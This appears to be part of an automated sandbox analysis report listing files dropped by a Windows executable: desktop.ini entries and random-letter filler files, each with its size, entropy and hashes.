                                                                                                                                                                                                                                                                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.0.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.0.8.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.7.....
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):190
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5497401529130053
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
                                                                                                                                                                                                                                                                                                                  MD5:D48FCE44E0F298E5DB52FD5894502727
                                                                                                                                                                                                                                                                                                                  SHA1:FCE1E65756138A3CA4EAAF8F7642867205B44897
                                                                                                                                                                                                                                                                                                                  SHA-256:231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
                                                                                                                                                                                                                                                                                                                  SHA-512:A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):190
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5497401529130053
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
                                                                                                                                                                                                                                                                                                                  MD5:87A524A2F34307C674DBA10708585A5E
                                                                                                                                                                                                                                                                                                                  SHA1:E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
                                                                                                                                                                                                                                                                                                                  SHA-256:D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
                                                                                                                                                                                                                                                                                                                  SHA-512:7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):504
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.514398793376306
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
                                                                                                                                                                                                                                                                                                                  MD5:29EAE335B77F438E05594D86A6CA22FF
                                                                                                                                                                                                                                                                                                                  SHA1:D62CCC830C249DE6B6532381B4C16A5F17F95D89
                                                                                                                                                                                                                                                                                                                  SHA-256:88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
                                                                                                                                                                                                                                                                                                                  SHA-512:5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):504
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5218877566914193
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:QZsiL5wmHOlDmo0qmclDmo0qmJclLwr2FlDmo0IWVvklrgl2FlDmo0qjKArn:QCGwv4o0o4o0mlLwiF4o090UsF4o01Ar
                                                                                                                                                                                                                                                                                                                  MD5:50A956778107A4272AAE83C86ECE77CB
                                                                                                                                                                                                                                                                                                                  SHA1:10BCE7EA45077C0BAAB055E0602EEF787DBA735E
                                                                                                                                                                                                                                                                                                                  SHA-256:B287B639F6EDD612F414CAF000C12BA0555ADB3A2643230CBDD5AF4053284978
                                                                                                                                                                                                                                                                                                                  SHA-512:D1DF6BDC871CACBC776AC8152A76E331D2F1D905A50D9D358C7BF9ED7C5CBB510C9D52D6958B071E5BCBA7C5117FC8F9729FE51724E82CC45F6B7B5AFE5ED51A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.1.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.9.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.9.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.8.....
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.696250160603532
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                                                                                                                                                                                                                                  MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                                                                                                                                                                                                                                  SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                                                                                                                                                                                                                                  SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                                                                                                                                                                                                                                  SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                                                                                                  MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                                                                                                  SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                                                                                                  SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                                                                                                  SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                                                                                                  MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                                                                                                  SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                                                                                                  SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                                                                                                  SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                                                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                                                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                                                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                                                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                                                                                                                  MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                                                                                                                  SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                                                                                                                  SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                                                                                                                  SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                                                                                                  MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                                                                                                  SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                                                                                                  SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                                                                                                  SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.700014595314478
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                                                                                                                                                                                                                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                                                                                                                                                                                                                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                                                                                                                                                                                                                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                                                                                                                                                                                                                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                                                                                                                                                                                                                                                                  Malicious:false
